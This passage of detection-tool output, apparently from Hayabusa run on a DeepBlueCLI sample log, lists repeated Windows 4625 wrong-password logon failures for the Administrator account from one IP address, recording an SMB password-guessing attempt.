AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.665 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.830 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.078 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.194 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.436 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.568 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.655 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.689 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.729 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.034 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.163 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.233 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.286 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.443 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.522 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.643 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.762 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.971 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.015 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.058 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.090 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.146 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.302 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.429 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.485 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.672 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.834 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:44.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.020 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.114 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:45.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 